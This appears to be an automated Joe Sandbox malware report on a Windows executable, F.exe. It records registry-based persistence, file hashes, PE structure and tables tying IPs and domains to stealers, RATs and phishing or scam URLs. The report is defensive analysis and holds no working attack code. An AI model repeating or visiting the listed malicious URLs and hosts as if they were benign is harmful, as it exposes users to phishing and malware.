General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465838
Start date and time:	2024-07-02 06:50:19 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	F.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@32/223@8/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 287 Number of non-executed functions: 47
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.28.46, 184.28.90.27, 52.113.194.132, 20.189.173.4, 20.42.65.92
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, onedscolprdwus03.westus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:51:20	API Interceptor	256x Sleep call for process: Synaptics.exe modified
00:51:21	API Interceptor	90x Sleep call for process: powershell.exe modified
00:51:56	API Interceptor	1x Sleep call for process: WerFault.exe modified
00:52:19	API Interceptor	102x Sleep call for process: ._cache_F.exe modified
06:51:16	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run ????? C:\ProgramData\Synaptics\Synaptics.exe
06:52:21	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	java_update.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	ip-api.com/line/?fields=hosting
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/
	x433.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	DriverUpdt.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	rinvoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	rQuotation.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	8f5WsFcnTc.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	ZkqNrYh5cV.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	rQoutation.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	v31TgVEtHi.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
13.107.246.60	https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08	Get hash	malicious	HTMLPhisher	Browse
	https://app.smartsheet.com/b/download/att/1/4551989320961924/a9qsrcukwyvga6dsz82rixnmpg	Get hash	malicious	HTMLPhisher	Browse
	[EXTERNAL] Action Required_ ACH Remittance Review Abrholdings	Get hash	malicious	Unknown	Browse
	https://he110ca11he1lpn0wwb112.pages.dev/	Get hash	malicious	TechSupportScam	Browse
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse
	2016621@hdel.co.kr_upgrade.htm	Get hash	malicious	Unknown	Browse
	http://www.escalon.services	Get hash	malicious	Unknown	Browse
	EFT 06282024, 013441 PM.html	Get hash	malicious	Unknown	Browse
	https://1drv.ms/o/s!At-8sPpRzvxIqQDSUMWIAACun1sr?e=FTp3hr	Get hash	malicious	HTMLPhisher	Browse
	https://lnkd.in/gX8qQ7ku	Get hash	malicious	Unknown	Browse
69.42.215.252	163.exe	Get hash	malicious	Unknown	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	sterverexe.exe	Get hash	malicious	FatalRAT, GhostRat, Nitol	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	gracNYJFpD.exe	Get hash	malicious	Bdaejec, GhostRat, Nitol, Young Lotus	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	RHC.exe	Get hash	malicious	Unknown	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	YHvknO2uwv.exe	Get hash	malicious	Gh0stCringe, RunningRAT	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	Main.exe	Get hash	malicious	Unknown	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	qwARi7ZlD6.exe	Get hash	malicious	Njrat	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	http://mooo.com	Get hash	malicious	Unknown	Browse	freedns.afraid.org/images/powerani.gif
	Windows InstantView 2.exe	Get hash	malicious	PrivateLoader	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	Windows InstantView 2.exe	Get hash	malicious	PrivateLoader	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0032.t-0009.t-msedge.net	https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	[EXTERNAL] Action Required_ ACH Remittance Review Abrholdings	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://he110ca11he1lpn0wwb112.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.60
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.60
	2016621@hdel.co.kr_upgrade.htm	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://www.thaicreate.com/outlink.php?l=https://p6f.org/mI1AchQ3EllQ3Ez01lavallQ3EQ3E2APchD5QD5Q4DCz01oTx4RAW4G	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	http://www.escalon.services	Get hash	malicious	Unknown	Browse	13.107.246.60
	EFT 06282024, 013441 PM.html	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://1drv.ms/o/s!At-8sPpRzvxIqQDSUMWIAACun1sr?e=FTp3hr	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://lnkd.in/gX8qQ7ku	Get hash	malicious	Unknown	Browse	13.107.246.60
ip-api.com	java_update.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	208.95.112.1
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	x433.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	DriverUpdt.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rinvoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	rQuotation.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	8f5WsFcnTc.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	ZkqNrYh5cV.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rQoutation.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	v31TgVEtHi.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
freedns.afraid.org	163.exe	Get hash	malicious	Unknown	Browse	69.42.215.252
	sterverexe.exe	Get hash	malicious	FatalRAT, GhostRat, Nitol	Browse	69.42.215.252
	gracNYJFpD.exe	Get hash	malicious	Bdaejec, GhostRat, Nitol, Young Lotus	Browse	69.42.215.252
	RHC.exe	Get hash	malicious	Unknown	Browse	69.42.215.252
	YHvknO2uwv.exe	Get hash	malicious	Gh0stCringe, RunningRAT	Browse	69.42.215.252
	Main.exe	Get hash	malicious	Unknown	Browse	69.42.215.252
	qwARi7ZlD6.exe	Get hash	malicious	Njrat	Browse	69.42.215.252
	http://mooo.com	Get hash	malicious	Unknown	Browse	69.42.215.252
	Windows InstantView 2.exe	Get hash	malicious	PrivateLoader	Browse	69.42.215.252
	Windows InstantView 2.exe	Get hash	malicious	PrivateLoader	Browse	69.42.215.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPECTRAIPSpectraIPBVNL	java_update.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	45.141.26.232
	oniCmGMx16.exe	Get hash	malicious	Unknown	Browse	45.144.167.158
	zbRmQrzaHY.dll	Get hash	malicious	Wannacry	Browse	45.139.167.2
	e9d0af516a8d65649c6850b69ff15e65cba280f8d44dbc505882dd16cf922320_dump.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse	45.138.16.219
	filedoc3720001.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse	45.138.16.219
	DND3243676432.exe	Get hash	malicious	Remcos	Browse	45.141.215.89
	Inventory-List.exe	Get hash	malicious	Remcos	Browse	45.141.215.89
	nv6mqExGOo.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.27.41
	y9vR6M5sU6.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.26.119
	84I4L4SXB5.exe	Get hash	malicious	AveMaria, UACMe	Browse	45.138.16.138
MICROSOFT-CORP-MSN-AS-BLOCKUS	mirai.spc.elf	Get hash	malicious	Mirai	Browse	20.214.3.230
	mirai.x86.elf	Get hash	malicious	Mirai	Browse	13.71.123.37
	https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://app.smartsheet.com/b/download/att/1/4551989320961924/a9qsrcukwyvga6dsz82rixnmpg	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	[EXTERNAL] Action Required_ ACH Remittance Review Abrholdings	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://he110ca11he1lpn0wwb112.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.60
	setup.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, Stealc	Browse	40.86.87.10
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.60
	http://pub-0ed5a1f263894eab8341e034994e9627.r2.dev/park.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.42
	2016621@hdel.co.kr_upgrade.htm	Get hash	malicious	Unknown	Browse	13.107.246.60
TUT-ASUS	java_update.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	208.95.112.1
	Roblox Account Manager.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	x433.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	DriverUpdt.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rinvoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	rQuotation.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	8f5WsFcnTc.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	ZkqNrYh5cV.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rQoutation.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	v31TgVEtHi.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
AWKNET-LLCUS	163.exe	Get hash	malicious	Unknown	Browse	69.42.215.252
	sterverexe.exe	Get hash	malicious	FatalRAT, GhostRat, Nitol	Browse	69.42.215.252
	gracNYJFpD.exe	Get hash	malicious	Bdaejec, GhostRat, Nitol, Young Lotus	Browse	69.42.215.252
	RHC.exe	Get hash	malicious	Unknown	Browse	69.42.215.252
	YHvknO2uwv.exe	Get hash	malicious	Gh0stCringe, RunningRAT	Browse	69.42.215.252
	https://been.sinclairimaging.com/cherrishhere/inthetreess/1030023sin5x6rroY1LCPe3P7ZrWxHmLv3iN%2Bu7IGFO51TnAztDsCZc13Mo53tQlPwTluQ7KpLEIt%2FyKEv0ne34dyhr%2FrfqQ%3D%3Dcla9202-/brruiisebee/kilttwear	Get hash	malicious	Phisher	Browse	67.220.84.116
	Main.exe	Get hash	malicious	Unknown	Browse	69.42.215.252
	qwARi7ZlD6.exe	Get hash	malicious	Njrat	Browse	69.42.215.252
	http://mooo.com	Get hash	malicious	Unknown	Browse	69.42.215.252
	Windows InstantView 2.exe	Get hash	malicious	PrivateLoader	Browse	69.42.215.252

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	13.107.246.60
	MOD_200.pdf.lnk	Get hash	malicious	Arc Stealer	Browse	13.107.246.60
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.60
	capisp.dll.dll	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	13.107.246.60
	20240506_120821.xls	Get hash	malicious	Unknown	Browse	13.107.246.60
	Renameme@1.xls	Get hash	malicious	Unknown	Browse	13.107.246.60
	mkFOY01Gl5.exe	Get hash	malicious	LummaC	Browse	13.107.246.60
	zyJWi2vy29.exe	Get hash	malicious	LummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRAT	Browse	13.107.246.60
	92s4OjHVFf.exe	Get hash	malicious	LummaC	Browse	13.107.246.60
	SecuriteInfo.com.Win32.Malware-gen.371.3693.exe	Get hash	malicious	Unknown	Browse	13.107.246.60
37f463bf4616ecd445d4a1937da06e19	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	216.58.206.78 142.250.184.225
	68#U2466.hta	Get hash	malicious	Unknown	Browse	216.58.206.78 142.250.184.225
	MOD_200.pdf.lnk	Get hash	malicious	Arc Stealer	Browse	216.58.206.78 142.250.184.225
	SecuriteInfo.com.Win32.BootkitX-gen.7605.8583.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu	Browse	216.58.206.78 142.250.184.225
	DHL Shipping Document Awb & BL.vbs	Get hash	malicious	GuLoader, Remcos	Browse	216.58.206.78 142.250.184.225
	capisp.dll.dll	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	216.58.206.78 142.250.184.225
	TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs	Get hash	malicious	GuLoader, Remcos	Browse	216.58.206.78 142.250.184.225
	doc20240625-00073.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	216.58.206.78 142.250.184.225
	SeAH RFP_24-0676#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse	216.58.206.78 142.250.184.225
	20240506_120821.xls	Get hash	malicious	Unknown	Browse	216.58.206.78 142.250.184.225

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	java_update.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	java_update.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse
C:\Program Files (x86)\AutoIt3\Au3Info.exe	java_update.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse
C:\Program Files (x86)\AutoIt3\Au3Check.exe	java_update.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse

Process:	C:\Users\user\Desktop\F.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	275560
Entropy (8bit):	6.292868175467042
Encrypted:	false
SSDEEP:	3072:zr8WDrCoP5KVkD8QC2mCBFv9m7usyT8tKQ9clyPqlO91/iDVSsWUG0bCP0BwOvO9:Puo4VQjVsxyItKQNhigibKCM
MD5:	5BFFBD5E0AC5D8C8E8F7257912599415
SHA1:	5A9F6AB857410BB9F3108A5A6ACF8A7EBA58361F
SHA-256:	A3C4641D4CB4608AF18CD06E4C01339C65C25B9289F0AA01CABE0E5C250A0E15
SHA-512:	D576DEE2BF7C66293758F07B2A19B8659BA5A65D2FA9C05BA254008F30B46447871FC66B7DED6AD6796B34FB91406F17536DF6E8E2465723138A31A9C8DA5B36
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Joe Sandbox View:	Filename: java_update.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................t.........x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................\|...................idata..d....P.......\|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

Process:	C:\Windows\svchost.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	502632
Entropy (8bit):	6.717621615137878
Encrypted:	false
SSDEEP:	6144:PuyWDxGH79J2VX5gEpvm7JA8I6BHAlSpFG/+Ls3ze30xB7zq2zs:0MxCvm7JK6JAB/6N30xpI
MD5:	A18560DD287C61996F6C3498FF2B6F8F
SHA1:	B81EF528445CCE2BA94A933385FAF56DA526CC25
SHA-256:	551C24CB52C55EB77300FAE5F77A9EE565848DA83A5CEBC4587C5912C94C0A92
SHA-512:	2B94CA43D2F41EE88A81121889DBCFF7B014622FFA2B3048DB7CCA1C6FB7CB3D18CCCB9F4791002E166040A658FA317E42B520D44929973E034B56B7ED9C62C9
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................t.........x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................\|...................idata..d....P.......\|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1319237615394715
Encrypted:	false
SSDEEP:	192:VQkVpsZISg0BU/3DzJDzqjLeA/19mOVzuiF9Z24IO8eDzy:jyZlBU/3Jqj8qzuiF9Y4IO8ey
MD5:	DE3A846E6659E917B63743C160493EC3
SHA1:	56396EC6154077256485362FEE9694998438F440
SHA-256:	8E34AD9BC0B3B7DDA155FB4869CD5B862606781A1E91D9F26753F7D39A45F0D2
SHA-512:	9C7EC73A3D2A6EB04D3CC0A7F5C0CD20C8C0AAB25974F17D07E87E44CF6BE9ED99E39DD953C021DB20F9BF992954AF7BA5AF4C811C9A1120085BF5D1F9E86025
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.3.6.9.5.0.7.1.0.0.0.4.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.3.6.9.5.1.1.8.5.0.0.5.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.a.7.8.9.a.1.-.e.b.a.f.-.4.e.9.b.-.a.a.f.e.-.5.0.8.5.f.9.9.3.b.8.e.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.9.4.1.4.9.2.-.a.b.7.6.-.4.2.9.4.-.a.1.7.c.-.3.0.d.c.8.d.f.9.d.4.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.1.c.-.0.0.0.1.-.0.0.1.4.-.b.8.9.d.-.1.8.7.7.3.b.c.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.b.e.4.c.c.0.0.4.d.f.2.4.3.6.2.7.5.7.d.8.1.5.5.4.e.0.3.b.b.8.e.0.0.0.0.0.4.0.8.!.0.0.0.0.8.1.5.b.b.1.7.5.8.6.e.d.1.9.f.a.f.0.4.8.9.7.f.1.8.4.1.5.5.8.5.1.d.7.d.8.1.2.9.7.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379351997661506
Encrypted:	false
SSDEEP:	48:yWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZS5tUyus:yLHxvCsIfA2KRHmOugbas
MD5:	F65FDE3CD5FDA1806F810A1142070F7C
SHA1:	47C97D722868F39FDE162DC4CBCEBD94AC211849
SHA-256:	86128D6E97C9D14A916F8E80CC306270AF817084BD06E683390A7C65E377F400
SHA-512:	21A7FB372793D01170BB6E238ED0C5DFFA53E8F2653490327BA608FC8ADD19F59B718E7E6866E7AE0B37D042F6B5EA22D1A83CE2C48F974D542E08D3E10911EE
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.5231029153786204
Encrypted:	false
SSDEEP:	3:sYp5lFltt:sYp5Nv
MD5:	B77267835A6BEAC785C351BDE8E1A61C
SHA1:	FABD93A92989535D43233E3DB9C6579D8174740E
SHA-256:	3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
SHA-512:	FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
Malicious:	false
Preview:	.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Entrypoint:	0x408178
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9f4693fc0c511135129493f2161d1e86

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15000	0x864	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19000	0x1400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x18000	0x5cc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x17000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x72c0	0x7400	57df3a5615ac3f00c33b7f1f6f46d36a	False	0.6197804418103449	data	6.521149320889011	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x9000	0x218	0x400	7ffc3168a7f3103634abdf3a768ed128	False	0.3623046875	data	3.1516983405583385	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xa000	0xa899	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x15000	0x864	0xa00	6e7a45521bfca94f1e506361f70e7261	False	0.37421875	data	4.173859768945439	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x16000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x17000	0x18	0x200	7e6c0f4f4435abc870eb550d5072bad6	False	0.05078125	data	0.2069200177871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x18000	0x5cc	0x600	2f4536f51417a33d5e7cc1d66b1ca51e	False	0.8333333333333334	data	6.433117350337874	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x19000	0x1400	0x1400	397378be285c0d0b2045e1e638e3bc77	False	0.434765625	data	4.407779029459289	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x19150	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4264	Russian	Russia	0.4366791744840525
RT_RCDATA	0x1a1f8	0x10	data			1.5
RT_RCDATA	0x1a208	0xac	data			1.063953488372093
RT_GROUP_ICON	0x1a2b4	0x14	data	Russian	Russia	1.1

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
